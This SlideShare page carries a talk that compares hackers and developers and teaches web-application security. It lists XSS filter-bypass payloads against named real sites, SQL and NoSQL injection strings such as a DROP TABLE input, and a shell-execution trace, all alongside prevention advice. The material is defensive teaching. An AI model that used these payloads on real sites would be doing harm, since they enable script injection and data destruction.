SlideShare a Scribd company logo

Hackers vs developers

Download as PPTX, PDF
Soumyasanto Sen
Soumyasanto Sen

Hackers and developers are compared in the document. Hackers are described as skillful with deep technical understanding but often unsocial and focused on breaking systems. Developers are portrayed as true professionals who work with people to build applications and believe they can change the world. The document then provides examples of how hacking can look simple, such as cross-site scripting attacks on websites. It offers suggestions for prevention including input sanitization and access control. Later it discusses hacking in Node.js and risks of SQL and NoSQL injection. Finally it addresses how hacking and development skills could be applied for social good or security testing.

Technology
1 of 36
Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
#sitWDF
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
#sitWDF #sitWDF
#sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
#sitWDF
Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
Make Difference #sitWDF
Make Difference #sitWDF Source: Scott Hanselman
#sitWDF
Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours
#sitWDF Thank You Soumyasanto Sen @soumyasanto

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 

Recommended

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security SeminarCalibrate
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG PresentationDamon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hackjessepollak
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgerymorisson
 
Drupal Security
Drupal SecurityDrupal Security
Drupal SecurityRan Bar-Zik
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
Interpolique
InterpoliqueInterpolique
InterpoliqueDan Kaminsky
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 

More Related Content

Similar to Hackers vs developers

Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security SeminarCalibrate
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hackjessepollak
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentationMahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgerymorisson
 

Similar to Hackers vs developers (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Interpolique
InterpoliqueInterpolique
Interpolique
 

Recently uploaded

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Recently uploaded (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 

Hackers vs developers

  • 1. Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
  • 2. Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
  • 6. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
  • 7. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 8. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
  • 9. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 10. Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
  • 11. Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
  • 14. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
  • 15. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
  • 16. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
  • 17. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
  • 20. Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
  • 21. Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
  • 23. #sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
  • 24. Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
  • 25. Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
